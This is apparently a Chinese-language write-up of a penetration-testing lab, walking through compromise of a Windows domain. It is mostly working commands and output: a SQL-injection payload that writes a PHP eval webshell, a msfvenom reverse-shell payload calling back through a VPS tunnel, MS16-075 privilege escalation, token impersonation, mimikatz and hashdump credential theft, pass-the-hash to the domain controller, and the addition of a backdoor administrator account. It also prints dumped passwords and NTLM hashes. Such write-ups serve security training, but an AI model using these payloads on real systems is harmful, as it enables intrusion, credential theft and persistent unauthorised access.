0x00 web SQL注入
首先拿到urlhttp://afsgr16-b1ferw.aqlab.cn/?id=1
,有id=1
,尝试SQL注入。
输入id=1'
,出现报错信息,不难得知存在SQL注入,且拿到了网站根目录路径C:\phpStudy\WWW\
,靶机是在Windows下用PHPstudy搭建。
**Fatal error**: Call to a member function fetchAll() on a non-object in **C:\phpStudy\WWW\index.php** on line **56**
?id=1.1 union select 1,"<?php eval($_REQUEST[cmd]);?>" into outfile 'C:/phpstudy/www/114514.php'
可以写入shell,拿到了webshell。
使用蚁剑连接,查看当前用户,应该是个低权限用户,接下来就是提权。
C:\phpStudy\WWW> whoami
win-55ook7lana1\test
0x01 端口转发连接msf
由于该靶机无法访问我们的kali虚拟机,需要进行转发才能连接到虚拟机的msf上。
这里选用的是frp来进行端口转发。
首先得有一台公网vps,设置frps.ini
,内容如下,只需修改bind_port
为用于与客户端通信的端口即可。运行frps -c frps.ini
[common]
bind_port = 2021
然后在虚拟机中设置frpc.ini
,内容如下,其中server_addr
修改为vps的ip地址,server_port
为上述设置的通信用的端口。local_ip
就是虚拟机ip,然后将vps的remote_port
端口上的数据转发到local_port
上。运行frpc -c frpc.ini
即可进行端口转发。
[common]
server_addr = <vps_ip>
server_port = 2021
[ssh]
type = tcp
local_ip = 192.168.32.128
local_port = 4444
remote_port = 4444
随后利用msfvenom
来生成反弹shell到msf的木马文件,命令如下,LHOST
修改为vps的ip地址,LPORT
修改为上述remote_port
的地址。由于目标靶机是Windows主机,所以生成exe文件。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<vps_ip> LPORT=4444 -f exe > payload.exe
随后在虚拟机的msf中运行如下:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.32.128
LHOST => 192.168.32.128
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.32.128:4444
在蚁剑的终端中上传运行生成的木马文件payload.exe
,端口转发反弹shell到msf成功。
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.32.128:4444
[*] Sending stage (175174 bytes) to 192.168.32.128
[*] Meterpreter session 1 opened (192.168.32.128:4444 -> 192.168.32.128:57458) at 2021-10-16 14:33:03 +0800
meterpreter >
0x02 权限提升
接下来就是信息收集然后提权了。
在meterpreter
运行命令shell
进入Windows的cmd命令行中,运行命令systeminfo
来收集本机信息,当然可以将结果保存在文件中便于查看。
结果如下,系统版本为Microsoft Windows Server 2008 R2 Standard
,安装了两个补丁,KB2999226,KB976902
,
主机名: WIN-55OOK7LANA1
OS 名称: Microsoft Windows Server 2008 R2 Standard
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00477-001-0000421-84879
初始安装日期: 2020/6/12, 8:22:09
系统启动时间: 2021/10/9, 21:04:24
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
[02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2018/12/12
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 613 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 2,266 MB
虚拟内存: 使用中: 1,829 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 2 个修补程序。
[01]: KB2999226
[02]: KB976902
网卡: 安装了 1 个 NIC。
[01]: vmxnet3 以太网适配器
连接名: 本地连接
启用 DHCP: 是
DHCP 服务器: 10.0.1.1
IP 地址
[01]: 10.0.1.4
[02]: fe80::518:ffa:1f73:c4c2
之后可以利用windows-exploit-suggester来获取可能存在的漏洞信息。
先进行更新下载数据,然后安装xlrd
,最后获取信息。system.txt
中保存了上述systeminfo
的输出结果。
$ python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-10-16-mssb.xls
[*] done
$ pip install xlrd==1.2.0
$ python windows-exploit-suggester.py -d 2021-10-16-mssb.xls -i system.txt
可以看到输出了很多结果,这里我们就选用MS16-075来进行提权。
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
run exploit/windows/local/ms16_075_reflection_juicy lhost=47.108.154.109 lport=4444
meterpreter > getuid
Server username: WIN-55OOK7LANA1\Administrator
net user so4ms abc123456.! /add
添加用户
net localgroup administrators so4ms /add
将用户加入本地管理员用户组。
令牌窃取获取system权限。
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-55OOK7LANA1\Administrator
WIN-55OOK7LANA1\cc
WIN-55OOK7LANA1\ms1
WIN-55OOK7LANA1\wf
WIN-55OOK7LANA1\xx
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
0x03 信息收集
明文密码抓取
使用mimikatz
抓取明文密码,这里出现了报错mimikatz x86 cannot access x64 process
,mimikatz
默认加载32位,对于64位很多模块无法默认加载,需要把meterpreter进程迁移到一个64位程序的进程中。
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
进程迁移
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
896 1472 explorer.exe x64 2 WIN-55OOK7LANA1\Administrator C:\Windows\explorer.exe
meterpreter > migrate 896
[*] Migrating from 2992 to 896...
[*] Migration completed successfully.
再来抓取密码,拿到Administrator
账户的密码woshifengge1.
Authentication Id : 0 ; 371991 (00000000:0005ad17)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : WIN-55OOK7LANA1
Logon Server : WIN-55OOK7LANA1
Logon Time : 2021/10/20 20:18:49
SID : S-1-5-21-968729399-1073357432-1689370247-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* LM : 9ce0172ee7ebc970764a5f2b155e5903
* NTLM : 4d1de63584701c85b8b9eccf5243ef83
* SHA1 : e20325b7a39aaf06a30914a61c1be19388c058e8
tspkg :
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* Password : woshifengge1.
wdigest :
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* Password : woshifengge1.
kerberos :
* Username : administrator
* Domain : zkaq.cn
* Password : (null)
ssp :
[00000000]
* Username : a1021
* Domain : ZKAQ
* Password : A1B2C3!.Qa
credman :
内网主机存活
ifconfig
找到靶机内网ip为10.0.1.4
Interface 11
============
Name : vmxnet3
c
Hardware MAC : 00:0c:29:a6:55:d4
MTU : 1500
IPv4 Address : 10.0.1.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::518:ffa:1f73:c4c2
IPv6 Netmask : ffff:ffff:ffff:ffff::
使用模块post/windows/gather/arp_scanner
来扫描同段ip
meterpreter > run post/windows/gather/arp_scanner rhosts=10.0.1.4/24
[*] Running module against WIN-55OOK7LANA1
[*] ARP Scanning 10.0.1.4/24
[+] IP: 10.0.1.4 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
[+] IP: 10.0.1.3 MAC 00:0c:29:4f:81:ae (VMware, Inc.)
[+] IP: 10.0.1.8 MAC 00:0c:29:17:f5:7e (VMware, Inc.)
[+] IP: 10.0.1.9 MAC 00:0c:29:2b:63:ca (VMware, Inc.)
[+] IP: 10.0.1.1 MAC 00:0c:29:10:02:aa (VMware, Inc.)
[+] IP: 10.0.1.6 MAC 00:0c:29:5b:78:0b (VMware, Inc.)
[+] IP: 10.0.1.255 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
内网主机端口扫描
要扫描内网主机端口,先添加路由。
run autoroute -s 10.0.1.0/24
添加路由
meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 192.168.32.128
[*] Use the -p option to list all active routes
run autoroute -p
查看添加的路由。
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.0.1.0 255.255.255.0 Session 2
开启socks4a服务。
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
VERSION => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
在/etc/proxychains.conf
中添加socks4 127.0.0.1 1080
然后就可以利用proxychains
与nmap
扫描端口了。
proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open
但是这里扫描速度很慢。由于之前已经扫描出同段ip了,直接限制扫描的ip可以稍微快一点。
proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.3 10.0.1.8 10.0.1.9 10.0.1.6 --open
Nmap scan report for 10.0.1.3
Host is up (12s latency).
Not shown: 4 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 10.0.1.8
Host is up (0.45s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 10.0.1.9
Host is up (0.20s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
Nmap scan report for 10.0.1.6
Host is up (0.41s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
哈希传递
6、8、9开启了445端口。只有8哈希传递登录成功。
hashdump
获取hash值。
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17e42cef0c5064217743f92bed737fa3...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::
shengxia:1013:aad3b435b51404eeaad3b435b51404ee:39f0f28ac072f26ea62ae53ae4786139:::
zx:1016:aad3b435b51404eeaad3b435b51404ee:c06e0b17f64c832a7d555168550ea75e:::
ms:1019:aad3b435b51404eeaad3b435b51404ee:2a8075a02dce44c2ed2af466b1f4f15f:::
xx:1021:aad3b435b51404eeaad3b435b51404ee:d5c485977ca5cf40e793cc99f0e51687:::
ms1:1022:aad3b435b51404eeaad3b435b51404ee:6886e033b9773dcaa2439416c561187f:::
cc:1023:aad3b435b51404eeaad3b435b51404ee:ce6d846f23351b24925b853f5a8f4c83:::
rxx:1024:aad3b435b51404eeaad3b435b51404ee:1b8b3b6223f73c08e22e99b2dd03003a:::
wf:1026:aad3b435b51404eeaad3b435b51404ee:62869a9d714197aca8b9c0f20e9e2884:::
so4ms:1027:aad3b435b51404eeaad3b435b51404ee:11d2fc51e410c0966a8e4a3530c963f8:::
登录。
msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.1.8
RHOSTS => 10.0.1.8
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
SMBPass => aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
msf6 exploit(windows/smb/psexec) > run
[*] 10.0.1.8:445 - Connecting to the server...
[*] 10.0.1.8:445 - Authenticating to 10.0.1.8:445 as user 'Administrator'...
[*] 10.0.1.8:445 - Selecting PowerShell target
[*] 10.0.1.8:445 - Executing the payload...
[+] 10.0.1.8:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.0.1.8:4444
[*] Sending stage (175174 bytes) to 10.0.1.8
[*] Meterpreter session 4 opened (10.0.1.4:41689 -> 10.0.1.8:4444) at 2021-10-22 14:12:27 +0800
成功登录进入10.0.1.8
主机
域信息
ipconfig /all
可以看到DNS服务器为10.0.1.6
,可以得知域控的ip地址为10.0.1.6
。
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : A1
Primary Dns Suffix . . . . . . . : zkaq.cn
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : zkaq.cn
localdomain
Ethernet adapter �������� 2:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : vmxnet3 ���������� #2
Physical Address. . . . . . . . . : 00-0C-29-17-F5-7E
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::81b8:ac83:7a57:b952%13(Preferred)
IPv4 Address. . . . . . . . . . . : 10.0.1.8(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 2021��10��19�� 22:16:46
Lease Expires . . . . . . . . . . : 2021��10��22�� 15:16:46
Default Gateway . . . . . . . . . : 10.0.1.1
DHCP Server . . . . . . . . . . . : 10.0.1.1
DHCPv6 IAID . . . . . . . . . . . : 268438569
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-74-83-9E-00-0C-29-A6-55-D4
DNS Servers . . . . . . . . . . . : 10.0.1.6
114.114.114.114
NetBIOS over Tcpip. . . . . . . . : Enabled
获取域内计算机,只有一台A1,也就是10.0.1.8
。
C:\Windows\system32>net view /domain:zkaq
net view /domain:zkaq
Server Name Remark
-------------------------------------------------------------------------------
\\A1
The command completed successfully.
获取域内用户,有krbtgt
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain zkaq.cn.
User accounts for \\DC.zkaq.cn
-------------------------------------------------------------------------------
a1021 Administrator Guest
krbtgt nf
The command completed with one or more errors.
获取域管理员为Administrator
。
C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain zkaq.cn.
Group name Domain Admins
Comment ����������Ա
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
NTLM
kiwi_cmd sekurlsa::msv
列出NTLM,拿到域控的NTLM61465a991b168727b65b3644aab823cd
。
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::msv
Authentication Id : 0 ; 381160 (00000000:0005d0e8)
Session : RemoteInteractive from 3
User Name : administrator
Domain : ZKAQ
Logon Server : DC
Logon Time : 2020/6/20 19:36:09
SID : S-1-5-21-4098506371-3349406080-1400905760-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : ZKAQ
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
[00010000] CredentialKeys
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
0x04 登录域控
有了域控的NTLM后利用impacket
登录域控
$ proxychains python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation
|S-chain|-<>-127.0.0.1:1080-<><>-10.0.1.6:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Windows IP ����
������ . . . . . . . . . . . . . : DC
�� DNS �� . . . . . . . . . . . : zkaq.cn
�ڵ����� . . . . . . . . . . . . : ���
IP ·�������� . . . . . . . . . . : ��
WINS ���������� . . . . . . . . . : ��
DNS �������б� . . . . . . . . : zkaq.cn
net user so4ms abc123456.! /add
添加用户
net localgroup administrators so4ms /add
将用户加入本地管理员用户组。
添加成功。
C:\Windows\system32>net localgroup administrators
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
���� administrators
ע�� ����Ա�Լ����/���в������Ƶ���ȫ����Ȩ
��Ա
-------------------------------------------------------------------------------
a1021
Administrator
Domain Admins
Enterprise Admins
nf
so4ms
首先回到10.0.1.9
的session中,然后执行run getgui -e
。
proxychains rdesktop -u administrator -p woshifengge1. 10.0.1.8
远程桌面连接10.0.1.8
,然后在这台主机中登录域控。
直接连接域控的话会报错Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).
,需要用域内主机连接域控。
远程桌面登录成功。
Comments | NOTHING